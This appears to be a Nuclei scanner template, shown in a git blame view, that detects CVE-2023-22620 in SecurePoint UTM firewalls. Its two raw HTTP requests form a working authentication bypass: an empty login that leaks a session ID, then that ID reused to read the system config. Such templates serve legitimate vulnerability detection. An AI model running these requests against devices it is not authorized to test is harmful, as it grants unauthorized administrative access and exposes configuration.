daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-22620.yaml

74 lines
2.5 KiB
YAML
Raw Normal View History

Create CVE-2023-22620.yaml
2023-04-20 09:17:09 +00:00
id: CVE-2023-22620
info:
name: SecurePoint UTM 12.x Session ID Leak
author: DhiyaneshDK
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
severity: high
Update CVE-2023-22620.yaml
2023-04-20 20:09:20 +00:00
description: |
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
remediation: Upgrade to version 12.2.5.1 or newer
Create CVE-2023-22620.yaml
2023-04-20 09:17:09 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-22620
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22620.txt
- https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/
- https://packetstormsecurity.com/files/171924/SecurePoint-UTM-12.x-Session-ID-Leak.html
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- https://rcesecurity.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 7.5
cve-id: CVE-2023-22620
cwe-id: CWE-863
TemplateMan Update [Mon Nov 20 05:10:39 UTC 2023] :robot:
2023-11-20 05:10:39 +00:00
epss-score: 0.02323
epss-percentile: 0.88553
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:*
Create CVE-2023-22620.yaml
2023-04-20 09:17:09 +00:00
metadata:
boolean format update
2023-06-04 08:13:42 +00:00
verified: true
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
max-request: 2
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
vendor: securepoint
product: unified_threat_management
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
shodan-query: title:"Securepoint UTM"
Auto Generated CVE annotations [Fri Apr 21 05:50:35 UTC 2023] :robot:
2023-04-21 05:50:35 +00:00
tags: utm,leak,memory,packetstorm,cve,cve2023,securepoint
Create CVE-2023-22620.yaml
2023-04-20 09:17:09 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
Create CVE-2023-22620.yaml
2023-04-20 09:17:09 +00:00
- raw:
- |
POST /spcgi.cgi HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
{"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"","pass":""}}
- |
POST /spcgi.cgi HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
{"module":"system","command":["config","get"],"sessionid":"{{session}}"}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '"status":"OK"'
- type: word
part: header_2
words:
- 'application/json'
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
extractors:
- type: regex
name: session
group: 1
regex:
- '"sessionid": "([a-z0-9]+)"'
internal: true
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot:
2023-11-20 06:35:10 +00:00
# digest: 4b0a00483046022100a58f6a5dd3e45e1e239484b6b62baf5f6ca17ddc3b8d5af9e00292304782733902210083d134ef7c788c059da49d22b980b4f9273a845bc3e0e0d9d3ba2a8065cf7e43:922c64590222798bb761d5b6d8e72950